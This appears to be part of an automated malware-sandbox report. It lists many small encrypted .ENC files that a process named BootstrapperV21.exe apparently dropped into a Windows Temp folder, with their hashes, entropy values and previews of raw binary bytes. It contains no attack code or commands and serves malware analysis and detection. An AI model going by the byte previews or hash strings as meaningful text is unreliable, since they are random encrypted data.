                                                                                        Preview:Iju...*).....i..D.M.?......C.&.bM^><.eH{58..acY7......V..K...;..Z.=..!.Yg.cG!\.j...|2U...2..f.0.r~.gF....`...~G.D.|...W.wE.2.?R.........*|..K...Cmy(.v....9.[._.2.EX...2..\..@dr..Ez..Z...rb1./...........B. 2ZDg7.=...RI...E..i...Vk..Yyu.Vq...|....}...%.e..}8..8..ox.....+....W<]u|o.._..S..!X>JZ..w.z...V}v.O1.M.f...w..Kc..=.P9YlJ0.@N..A+<.<..$2...?.... ..Io%.'p..;...\.9%.\...lR.>G...e.A.-.....6t.........6.U...w.GgZ.dq..L.1......!..[g.z...V,.|..T.j...h...L0...C..........;.J......h.g"...

                                                                                        C:\Users\user\AppData\Local\Temp\5064077962.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.573445436690461
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Aw6T2Iim0kEjoav6YodX+DzLbHGs6LlGedPMnI:CTSm/EZv8+DzLbDgXdoI
                                                                                        MD5:DDBC78FB084A4A7E2343E68068AB8478
                                                                                        SHA1:AF3988232A3EA7235767DE2DA8CC735C1BAC0FD6
                                                                                        SHA-256:2377756994D3D1986F492D60647DF56B0D1CC3A240AD60F9C9B175D97C27F434
                                                                                        SHA-512:D571210C2173BB8A33F01C9EBF804CFE45D0D16E8B3BD04211DD31E81C15A1FBF36D31B3A6D0EFFCF6734E3BBD100CC627AC08A743D46781E326BB41AC553F6F
                                                                                        Malicious:false
                                                                                        Preview:..(L...WL=.,mk.K...:..s...iGq.O....s..4.!<m.A`..HO.4.1j.D.u...nG....s.0.d)D....,x..f,....J..C3..j~.........=+.%.<Aj.!G#n......V. Xw......^X.3.8O...~W..?..I..?.F.3...7.......Z..e....rA.^...WjY.n.a)..'..^..../....emt.{.....K.._.>...u........f.....d.........w...?.w....i.=.j....;Yr...|.....yQ.v.>..+....=...<.E>.......x....>.D.....*.F....hx"....H.q.\..;...t...u8.`......8../DF....[..8lf.h'bgXl....q*....V...U<.<....(wP....).S..`...W..<.....$..Y.#0..v....6.."..0C.H......3.-...5...g.:.z...T.Y.&.

                                                                                        C:\Users\user\AppData\Local\Temp\5281104033.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.59116264978925
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:8TAT1tDcDPwiFnf/gdFRcrCA6le/MelUq/QB+tRwSXG3b2rH97an:CATzIDPxG5JloMm/QB+62Tpan
                                                                                        MD5:A66A2E503049A8B7710107DE38110C4B
                                                                                        SHA1:F71255DCECFC14D464762D5E7E2DB90D4617F8A5
                                                                                        SHA-256:7E819BEDB4812184B60288555F8DB6E54A5DA9745AFB696532C2152CA0ED561D
                                                                                        SHA-512:02E2655BFC75D819447DC82B572BD191AE20E974ADC7AAFCE06E19B0440987288B1312EB5FA3FF78813B992F0268CC4B853A95ECB3256E3928FE1E148F3B8704
                                                                                        Malicious:false
                                                                                        Preview:.F....|r.c%/.M.H._fDr..B........".].8...'..L.F...?.&.V.3...ey.p..Ky..V_.m.]....D.Lm.K..phW.e....wq...kda[%.?*..t)...t..[.'.Y.QE.......$.@x.k...EJ...b.P..,.Cd'.'m.... ..$.....`...{........2..UK.....e.z.g,..F.Q..E......g..P|tm.....&'..l8 Ac..v).#Q..Z.....a3...*..;.a{G..}d.^.q.x.oM....;.%.k.. ...i.S....._,G..*.8..%.2uw...e.kd.QQ...aQ.%q...........e....j`D.....]2.\..8E.(......!.....C..b...=...>`?..2.....%.5...fk..9.t..f/.V..c..D^....gJ...C~C...(.,..^.}^.A.:.$,..@L-.8o .C.>......H8J....

                                                                                        C:\Users\user\AppData\Local\Temp\5491630718.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.62190814956606
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:ViJuswGnDSH5AJZm+T0eRtK5UlpZV1Z5oukgHb1jWDqyXd1:oJBZmTQIOb15onaJjKqyXv
                                                                                        MD5:A212FF3F28E28AFC08EBD05970893811
                                                                                        SHA1:EC2ADEE78AB5B55527FC4D8B35A45E104A678D3D
                                                                                        SHA-256:7A8F72A7032441F2433EFDDBA9AD10D6818FC5EB3DE2EEB7DB4A0A00CE177546
                                                                                        SHA-512:CD7F3F36892A42ABDC7370FDAB9BF2A33A4F08EC980B02B59A5114A66A77F22F7104C8402FE5253A9D4F716C6A7C6803EC9926A12E6FFEE1BC76D81B7F2E367E
                                                                                        Malicious:false
                                                                                        Preview:O.L..Vj.s(...U.....4M.<.;........&.4.....f...p\Z...Z.2B@}=...+0Z..yx..."...#.yE.....)Y.d.....JV.m~.7.S..-t..)...V......R]*DA.....B..d.U......'@...a..+lw..%..Q..K...#....!..r}AR.n....?"........'ui.#..}%.q..EI..K\.J.."...../E..x.9.c?......G.BMw.ju.>...Z....[G.l#...$....VkDm...]..+.f..B..h..#5.T.W....: ;#0._.7.:!.. .Nj..>.x...F.. ......|!;......j;.m......,a....A.sp..Y..7..qY..w..a)..^..E..u2..|v..i..;.6....y..u..zzFT...'.1GD.3.M.n..*.^g....>S*..#..I...`.Y.... l..J6.....W.'...|.....Y

                                                                                        C:\Users\user\AppData\Local\Temp\5622580005.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.570157010136587
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:zaFt1Sa+rHVKKEoklujCBh6fI4Bx5GRsE+3MisFgc:zaFtArnBgX6MqE+8isSc
                                                                                        MD5:8B0DBCE364D7D50DF330F53D211D02C1
                                                                                        SHA1:FFD786ED3C09BB6C738B9CF344A6820F025CCE9D
                                                                                        SHA-256:26B021AD13D06FBC89B679C428894B8BEB8ED21A7D936B760F7D58BA719DD3F1
                                                                                        SHA-512:CE7D263F9CDAFF8DF1674C88BC5042FDE1494EF9EE5695D5D0E0A48521F39B1B52EA7905E6E89B92CDDFFE91D82A6FAD0E9F743861AB6C7B20BB21A7E78D2843
                                                                                        Malicious:false
                                                                                        Preview:...5W.8..-\KE.{.B..twy.zk...!;.Q.c.E.....{,&}A...R^w.K;PL.R.79b.....?.....z..[....(..^....%.d..b.,*.T...@]..vh9XMAh.v....4x....(..2..=..#....C..m?n.~.0.Mv....GM.....$....."aI.g..-:Z... >..h5.O.....3...j.-.e.w:.....(......C.a{.|.j...j=..k0c>..<b....?Z..|'...(....|H..xP...:F!Lq.i^.......^#L...7...G.cM!.........U...a....d...qvv#l.,. K..^._...7W.4........i...HN+.e7..Na.E..C.K.=...{...y.I..Q30.Q.V.dNM!...Z.V...m..n.-....z...-#.>...(.B.;@.i5.+...p}f._j*.%...U$..k..b..e....W....v:U.q..y

                                                                                        C:\Users\user\AppData\Local\Temp\5713452101.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.567592971021809
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:k4MQyb404OBH5X9ahduB0UktX9LSQdtc+IBbKNn:k4TqdLaP6SttFtcZen
                                                                                        MD5:A316C4B77D3A8CB7B1ED30CDBE1FF7A4
                                                                                        SHA1:2BD39D0E280ABA2F6C3DD187F2FAF31E5ECD987F
                                                                                        SHA-256:FE4A32E6B4911AD716328D724E327B1875B9C77EFF1AA314F35BE069304301B7
                                                                                        SHA-512:84C56C39A7E682B2CAA9E33C8F401E058E72183F28759D2D30C084BDDF367D3EE35D7D3192743E495A5F5606EF397AE68724C9D1889A790E9907E068FB217D78
                                                                                        Malicious:false
                                                                                        Preview:7D...Q...H..8b`b......,..M5q.>.=..c..7.Y@.....iL<.m...:>..8e......D......V.l..a.....]..u..4..80_.4...6B.0.h.s.......T.7l&YW...L...O_z..V.TZ).Z.v$......$....A.z.Sa2}.../d=...S])..6|.4..RJ.........s.u.)...z.q..hZ._.%.^.+....z........f...$..k ..`8|ez5.t.g`......A.(.X...?aV.u4f..TT.^..W...L.$..../...q..<T...v...M..O5_....s ...O.G.....F..-...4.....n.pE.Ma...$....L&..F............w.\.^...G7.:.W^)=....nS. ..<...eA5...A.....P.....}.|..!...f......F.>9.y...'.]/2I....i..Vw.Kh2.@*:..$......>.r

                                                                                        C:\Users\user\AppData\Local\Temp\5809130301.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.581806452348014
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:EsT+IdfxEtDKA0KHA3hSiMXc0k1/BdNRGksaoeQQb:NldfK+NKHidyo/rDGlaoer
                                                                                        MD5:034DD16E6A78E58B030E8770E94231DD
                                                                                        SHA1:4EB4329E5AA85E5D66714C8782972195C46DA620
                                                                                        SHA-256:453B782FE9A4F17B1BAAFE61C4AC8BE7719D47E72509C0B298F9489B75AA12A6
                                                                                        SHA-512:84DED169E3AABCA5C28AF6D953818D6E314C2BFF321E507F9ABA7434A3A03A3A6ACD80FFAB9FDF73FCBDE3712D0170ED44583C31375E41D3B58E08EBE5FB87D1
                                                                                        Malicious:false
                                                                                        Preview:s&.1Py...kEAQb.:v.$.Y..&...=...D.$L..g./.4..j.1}R......gVSY.R....S...B...i3.-..I...sUl.2..?..++-...M..K.p..RF.{.we.-.s.....u.U.H....>).x.V#...7....1?y....b...8.C[.....-.o.p...!@.)..7.d...!..Q..;O...z!..K`....%5x9..7....~,.....9k!..8,..F..D....q..'.H.^.a.e1{..\........cDK..4.........X.8.]..6...h:..qCNc...H]...D..;L.MqW.c.Y.$....nW.F.%)...1K....T...(..u. .....-:......k..@.`...5....H3I..W......ol...".5,.!.0.O.M.T.-..j.P.I.Xo...]aA.~.X. pm.|.]o.1.WA.....I!.4............6...#.:4.+.^..!..~

                                                                                        C:\Users\user\AppData\Local\Temp\6092905029.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.574956782344756
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:gqCMwLAyEVbElb/oGtOqgsAEkY4kxKYUJWjn:uAywbGgsAONtUQn
                                                                                        MD5:A259CA0113088685EAB9A09ED7A71EAB
                                                                                        SHA1:4B457AEB79BA271FA6EB0545D100C00E1ADB2ADB
                                                                                        SHA-256:E724603C40C6097D07C6ED370A42B7C1C6281F657AB415A104ABAAB1B787C181
                                                                                        SHA-512:F4BFCD9FF11C681908407E62666D491142F9A4B4DCE7F357EDB21AD722686C531156A6E2C58D264081DA4D177541FA46502A3AE707114DD72A9AFCF377B9906E
                                                                                        Malicious:false
                                                                                        Preview:.ygz.P.....%.5.F<...^q.4.w.......I.Q..D........%....;~K.{.......p..\..I..7^.]b........U.......\.....$.............[n..W..o...._.Te..........h#.Y...^g....e..a...^.t%..~|.<4.>..L..s.."....J ...h...5.Q...]...Y....."e..q....k.Q...Y..T7/..x,)...;.Ii......%.........MF,q.".Y#.c.b.~...h.._~...H.m+..pq...N`?-.Eb.{...F.e..Y.r..6.....v.4.....{.!.\#...CUL.,dw%=...F.v.H..ot.&Sg=....Y...X`...jD.!D..... eF......P.&*...J."....;..[&8c..<V.u .*..a1A3-..Jf.n...U_..}."..".R.ks...ez3h.JW.G.y..M.&...

                                                                                        C:\Users\user\AppData\Local\Temp\6109303877.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.588471791209099
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:xlY/3KAv6MXy4dhU3P2xgC950R7/NRJEui0qn:Q/6Av6uBhrXOR7/N4ubq
                                                                                        MD5:5B2CBA279D74E0B599997AFE82BC7289
                                                                                        SHA1:70D05DE8F27470F31653BFAABA7B828B741F332D
                                                                                        SHA-256:4B1D49398CDD12960FF305118140F1CF9B44C805AD109AC42C83EE4F502AB0AE
                                                                                        SHA-512:BC010675509B3D07A4B3788FE0CAF3B19C01614F6082F9CF0D8F8C3DE2DAE356104AA0810F050A88688D2C4EC85DE0A9BF52C7F757BBA0A3F9228E2A71CA0532
                                                                                        Malicious:false
                                                                                        Preview:.N_%......U...t.xR.3../.u.....p.a...C...z.B.z.G....X.G..(... ....r.0...d.Z.1.e}....4.../.K...f.1C.0KR.....w.@.)`...<..3k.n.}g.....:.#.<Q...U..6..r)....qUE..PA..:...Q9.2...8.. /..o1E....T.B.....m...0..|...5.~Hm.;..j.Cl=P....GJb.Y...3......0H.0f..\......*.....M....p,tJr.#..PcM6.l|g.!..@5~p=..t..H.e..q[.tZ.).?2.Qz}Y.kw..g...p9.:5...._l...S.;.a!..d.....:....>LE....1....m...s......U..*...M&.-a7.SHNo.<.e..q..?...|!.v..._...[.....*j.d]..LZ..n...NB.2M...u]h^...m...#_..>...G..p..8x..)....2L...*]....e

                                                                                        C:\Users\user\AppData\Local\Temp\6183211589.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.615179939726105
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:tO0W0gSfVzJjjmn7ZIpga8KsKpozydj3Ckf8xI/jmQ:tJRd5GtLa8KsKVx3fR/jmQ
                                                                                        MD5:775BC4D9DF54299ED64C280465B2F5F0
                                                                                        SHA1:B4B126D4AB05AE61CC33DBF52BFBA575588F7C20
                                                                                        SHA-256:0D620E74D645073662FD5C4A02E69A2AEE9953CB2A654D99C50CD2BD9C344F91
                                                                                        SHA-512:799DD1DA7AD79480EFB7A7922D4FEF3050728D4EEC01C5B85A3B5D97FF8AD3B191B1038908696771EECB05E24C1AD3EA6538BED00CAB9473278E77F8771C92F3
                                                                                        Malicious:false
                                                                                        Preview:l.....S.0.Ntz..m{..|.=c.D.<.6E..(..^./.%.....t.Lj..8T_....e..7...,.....~.2.=....(..-97..5.XKEKy..o...yI...f_....w9A.?.........t..}0...h.....[9 .3....d..:u...U1.H.f..I..1....K. .'..8.....i.e.>bug|.......C...R(..E.......T-Ls.....$.5....&7...2b.-..Wa..R..tG.......O.,..m...cg..l`.F..y.r...SI..Qg..D...l.\+VF....*.t`..J>I..G%t..>..c.L;K.>..UO.....#{5ypI..H...U..}...Y<..,...uf.M..n..Gf=E.{.D.c..53.c.1.c......1.......!A.X!~.......\...o[k ..N0../li"...0.&..7.(.%.E.]y.x7Y+....r..U.....7@..... +WK.76'.

                                                                                        C:\Users\user\AppData\Local\Temp\6213653276.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.589007888131853
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:D1ogDXHdvtv8FdRXsaW+vai0UMbhC3EY1c:/9vtv8FP8asi0U7x+
                                                                                        MD5:7A7FF33AB902A3E2F10627299C426C10
                                                                                        SHA1:216214979EFF07AE10E4D2A1B12F99A1ACAD5375
                                                                                        SHA-256:3CEB9E25CDF1EBF06A119C83C38C2A74982DE8CFCF80816EBACE22F13A6A8947
                                                                                        SHA-512:371A4BAF3AD1B26C8ADFDCDCF6E2069EA8036F2BEC3545F03B027030BC10021C51893167D0281BF0EA48250C542877363D2770A7C2727B4EBBA17BD71C273E4F
                                                                                        Malicious:false
                                                                                        Preview:.X..h/M.~.P....:>.....G-..F.I...*...`.....6{.*%...Y.(.z.*^.m.@Z.T.-_&..Y."..o...E.w.t.>5r.....(..<F...{.3ap..Tv...Z....&{D<v~#.=".:.AyjV..U.>&.".q..8W..`.....9.B.O.J.h.......N4....I.s.%.QaVEvWc.1..&.6y..\.T..t...Zg...M.L....x`..2.S.W..z..1.9...T.S=.>......v."..z...x).^>3..0.P.;%(q.e.'r'.K........"IAk.>...p....{.a"#ws............k.p....F....\M<b..y....Tz.u..X....CjemF.p^..g..:9...+..`/..l..X...e.hWJ.f..:.l5....fS...O}H.V....mg:f....E.)_8....6o@zw.G..@.D.a.......e...4......{.$R...1

                                                                                        C:\Users\user\AppData\Local\Temp\6329227256.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.573944577611583
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:+iZ8KJaE/UMnMk/5kYNkyjSbC+cHM4vMlIlt/Njzy:E0aeUMnbbRQCilIlbj2
                                                                                        MD5:91F2E5F92AE7F36E909B21F240CC9A8D
                                                                                        SHA1:3B0403853CC8D6F6C8BCE48BCDE4FD2563D16990
                                                                                        SHA-256:FF14C4E5F69B181C2CC60365B113A3D3A2ED3C0B13C83DDF931088AA5C207C6B
                                                                                        SHA-512:8CE913F3C6BB93D250EF0CF663282214832BA905B605B8372DD986F48B6F4D48C58A75A513B320FB721F1E52548131BE57061F51D31B26A8F7A74E34B881ED24
                                                                                        Malicious:false
                                                                                        Preview:Je..r.(.d...t.4f=...&.^...X.snOy..F.A.F....[.xD.:t+.6I......~.A}....Y..q..e..(.0..\z..m...t.....g...._.7..~$S...Zio....8.z..WDM'S.....|.VcS.Q.A....x...|...~r.p...*.@.S^...Y...q.'....Xr.0.+.q..5....i.%.^..f..d.g...a0*..N'.K..8........4..l...tQfB..ES._..V..h.(..D.V5.x...{..pP....k..pr.%o,...").y({......+N.. ...k.....I._97..$.~.{..l.{U.J./1+Z(|..7..J.Y.$.@..;.....\iLA.'...}."}f.W..q.....cd4........C.gk6..\.A#.....H....}....?:..7h}..s.u....ly+R...nV.....(x.K...a.G.....f.dM..!...@.]}..

                                                                                        C:\Users\user\AppData\Local\Temp\6422942404.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.632078920330393
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:dTuEzhgAuRp/9X/J+9jRErrSlaJME0ggZKeQIQH6:YpAuRp/leGmaJMlZKgQH6
                                                                                        MD5:C5B914C06933A0359A918BE8F8BEF9BE
                                                                                        SHA1:EA512320AC3DBE2E1FC9E31B030353D36C654422
                                                                                        SHA-256:355B5EB64E576CFC113C7ED99E12E1FC73CA634E0800E094E3A2BEDC13483912
                                                                                        SHA-512:7A2E348178E31F91B8B2905652DBE6B01935DE5DB4C3AF52B02F33D9E6EBECA78BB5F60CF95688EA2C030B49F2127A1653C559396CE3596F23EA1620AAF8CEAD
                                                                                        Malicious:false
                                                                                        Preview:.......2 7.O...O....L.#{./J.x..*e..g}{CRt;{,....#.=..i'F.<n..*..y...P.IH..&X....;.....:.8.E.n.y.....,d...Lh%......B..._-.S,(..6..Y.....[.8..Z%#4.e..F3..._..Z.Bc.....u.....2l.fA;G.B.9.....4....o..4(.i..k%.;.....e.......?.;..z...C0V...R..$..W:5..._l....p....g.`i..J./..g..X...HX.......Ku.%...).c..(.NO}.Zp:;...W2@h...{.....E...4*.zm!.R3jf.^1h....S..@S....@...*.hwc.qJ.YR...2.f..th.6I...D{.0.drY3$....>.n.K6.+.:.....iL.9..V.qZR..?.@#.av.......c.'.....M.,.S..q.........^../)..!...Y.ek.&..D~Gn<.!

                                                                                        C:\Users\user\AppData\Local\Temp\6577738837.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.614863429816494
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:jxJampmh2eG/lWUmdng7Vmzv8aNQa5fhZyL6WSq:zam2KWUmRgBBaNQcfhZy8q
                                                                                        MD5:05032661A802B8CF3678B61CFED1BE78
                                                                                        SHA1:CE31130F8BD6FC027C9889E8ECF7D4C2AC80A162
                                                                                        SHA-256:C11170C01F217E816DCB5E77DE4D1097CAF801B2004D8B19688629625B2BD12E
                                                                                        SHA-512:3F604109749FAC2FA51638A8C8D9F54AF839425C1E3D98B0375DB9A6179CC2859825226E2EFF43E9F721BB0FA98949499C3308C1A27D276FBE3879C63095F44B
                                                                                        Malicious:false
                                                                                        Preview:.!}...C..Xv..b.\ .]...1mD...{...*C.J...k..&.......9..8.W..4......,Q%T.....op.*.(.s@./.e.=....C.......1........\^.E.1...1.._...Q~/;.3R]..5f|.Pd.pqa..a.D.<....v....S..${F....4S...:..y.JKx..=..9.w.k.H..Q.....KM.0.4..v....[.4..y mx.#.....].+).R9.u3..2.y..R....y..9^W..,T...R..Axd|r3h.z.N....G{......o...=...#.j...8g=.....J.6.8#?..|+W....4.5.jB.q.n5.y....!.~p.o...g.Hl../.........).u..V^.t.{S....va.[....*.t[...[u&r.U.i..p.g.uB..+u*..P....v..O....+..w...5}..v.P.. ..}u................CL.b.Q

                                                                                        C:\Users\user\AppData\Local\Temp\6750529025.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.621373452571202
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:lHZ6S5bXOG1ChFdoXC5mC+2nx1PCnOvyj8yZqqLw:xZJ5z71eaXEmC+C/Qq4w
                                                                                        MD5:5D65AE8B4AB9BC04CDD9CAFC3F202BB5
                                                                                        SHA1:60288DB5BE2A7D7CCC3722C87A244CDE2EE7E6C9
                                                                                        SHA-256:BDBAF4458BD314F9CAEE9E42CF5BA2BC12BBDAF2E4ACD057D85CEFCA10863EF3
                                                                                        SHA-512:4B2F69FDF93748E4060BCA3D380186DB27721133B8AA5C3AA26E02424058AC0655510D91721D11C9C0C1FED49273DC47BC962D7B083A2133FF3AFF8E03884B23
                                                                                        Malicious:false
                                                                                        Preview:6'!6K*....Y.Y.~..'9T....=..I..j..f............U.F.ge..l.......".fJT.?nY.5.{..`.gCG.,.0....;G....v.}...Q.g.%hG`852e........I......wt..#..8W.....2.X.B.qT&.\.C.R>..C..#..I.OW3jd.Z......xy..m..j.N..f4....K..B.!......(.V....?.i.....?p..X#.E.u...Q3B.-.P..xf..82=..T..7...}.......$j.7..cmb..DVk#....&w_..... ..s..nN.[....`~S#].0....lF......\.<.k.^.*..........6...n.....+.`k.K.`...7...r.I.>-5(..j.t../..%..J..'..m.n,. .2....D.....Kq...,.:&...X K~.f....h.h..........,.......r.2...C.Y...D.vHo THP

                                                                                        C:\Users\user\AppData\Local\Temp\7011884383.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.559181825540448
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Z8jq9g62oLz9kmdH5QaS8pJLmgZDsdSthFXBYxoWjjjA7Vm4l0Amzev:ZKqO6v/lP5pJmgmCpYxos8lF
                                                                                        MD5:8FB1F96A4D225D3A17487296FDBC3615
                                                                                        SHA1:94ABBAC282BCB181FEC7065D14CE71689816F272
                                                                                        SHA-256:1B889D2AEF65A189929D6C6546A36AFEB6334EF79BF6B2695ADAA6A5B02EE5F9
                                                                                        SHA-512:7D8A530506D49E4288D938C76B2C749216269097AC37820EC6DF0BFFE8D98915691240D052DD63FCCEAD1635DDBCC15AFA1ABB50156D4406DAB98FD627BCB052
                                                                                        Malicious:false
                                                                                        Preview:.9.....hnLD.[.......f.<v@D.J.p.:L..[O5....U...(5o....5.b..==.T....o...n.dg8.#_..5.+n..@....D..........H......b..x$...+.......r]....^......0.J/....x...:E...U..7.(sn$.......-.7.....j.k_.......t.p.\.f~../...AUB].P.g........Bj.O:.t.........Lx;+.9.j...4.....|.;...ti+i.`.E.]K.0...7.].F..J.ga.Z..2.JR..............z.:.t...P.;....ki...W.\'~....ZHA..A....#*....H.Ke:<.........q.RZ...%.=.f.Y..).F......lFJ.....DS......6.L...[l9.9S!.`.N....c....;!|.O.c.ON.1.6g~..`9.I.p.^.....#;./...i..0\.4..

                                                                                        C:\Users\user\AppData\Local\Temp\7155756679.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:Clarion Developer (v2 and above) memo data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.642977737705227
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:LI5LKGDSNpyiSjJTmqqF8JcaP8TRnKpag2:LXGDHlThq6Jcw8TRKpi
                                                                                        MD5:DF2D3E47AA88823DBEE00E7836FF830D
                                                                                        SHA1:D81674457DEA4489357025C9EA79B7D3229C973E
                                                                                        SHA-256:47359FA7CF317277C0B661FA2083D92564036954A4534E9228F4A894527599DF
                                                                                        SHA-512:7CDAF2ECCEFEAC365243800C572B2DAA05E81A6E7E189E66B50D629147773B9B27C2743F88B09B88B9776E63F4CBD0C539AD0AA42DF7AC353CA2735B92952496
                                                                                        Malicious:false
                                                                                        Preview:M3V."<..i.239....NY7+s...\).....4.:(.{#B.eK..k....X;...?r.Dz...EN.5Y........(R].L.......|.i..U.2vo.#N.Ovx..!..z?V&$.[ILnSi....ou...s.P.C..t.a..w{.YG..W.J....N....F..|/.&m.....(.D.v`.......Xn..7u..].;)72^..N...?...nF..%q.{..y..h6.5..A.<WQ.p..x.mQ..dt...$I..&.u%.Z...*2....q..p.J..!.....y..U...Y9o.,!r..e.qG..8.H..#..-..B....^...@.W.!>.......9...C&u...0.CtH|....;.....:/t.....k.nr-vv......y.y.y.9..bZ......{.*.3...M~.....W........s..^.....%.....+.chZ.~.'....,..."~t..........Vz.[

                                                                                        C:\Users\user\AppData\Local\Temp\7216804956.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.6238994581767106
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:YPkzwjKc1Ne0FcJYZVeL2oYGitEd3BRyQKKcamZlXTi9FO+6LxKdg3mn:YDN3FZTGitEd3fK/am/+9FPKIa2
                                                                                        MD5:CA0A761EA34BC21F3CC990C0AF957EE6
                                                                                        SHA1:C2FCCD31B9DB66AAA2DBD38D34347DD162C32464
                                                                                        SHA-256:91E5558B687C58234876EB248D64E6172D15DCB0D49A529E77EEA526848BC7F0
                                                                                        SHA-512:5E4C0F4DB1A60CEB99B116496A09BF2D521174CA4ED7955730B452713AA38E6B5F1A39087D71523B2B8C964BB870592A62014EAAA3BFBFF46286E71C142AFEA2
                                                                                        Malicious:false
                                                                                        Preview:G....;+..k..-...C.n.ok....t 9.Z.....)./.U.....S'...p.g.....nLhq...k.o.hEH.5....$..6..T...=....G..k....T.*.Z.NL-.|K.l5?.X.e:a..C..6g6......NG_.....Lb[&..2.AP.....~V.....o.?..B\./.|.{."....u.A.X7.4.qA..&....Z3..xu1'..B..P..Y. ..o...H.?..+-.../.6.....r..,..u2.G.Q."i.9.d..cM.[.0..._68...nt.......WOo...........a............'..}?.....d.*+/.|..+^3..N..~!.....C.4.....X.>......@Y.7.V.n1........L.L.._Ua.G.@...u"K..t1....c......u..N...#..L.b.6U.-.$.|.z.}..o.MC<...@,.R....S...g.L..\p*K)mHn.........

                                                                                        C:\Users\user\AppData\Local\Temp\7245361316.ENC

                                                                                        Download File
                                                                                        Process:C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):512
                                                                                        Entropy (8bit):7.565638618412789
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:Xk0dwbiiMQR3lo6fh+FJAyc2Dy5/ceUHqf:FwbiZQ5l7fqCUHQ
                                                                                        MD5:10AC9180A5955184B4D79A55C27C803D
                                                                                        SHA1:E7CFCDCCA359A6E8380DE4371772C7C9A9785844
                                                                                        SHA-256:C00E8A8173C9EE26D2E7628CE7F1B89FDB368AAF983498D018AB9FF250C4050B
                                                                                        SHA-512:1BE776D015C47847A9F0E3C431C5CF08B8B1D4182AFA5207981F618E7B4E845E61B2C23666FA67CC502401124029E135AC8DB1BAC205674A3C24C76D9F42EB44
                                                                                        Malicious:false
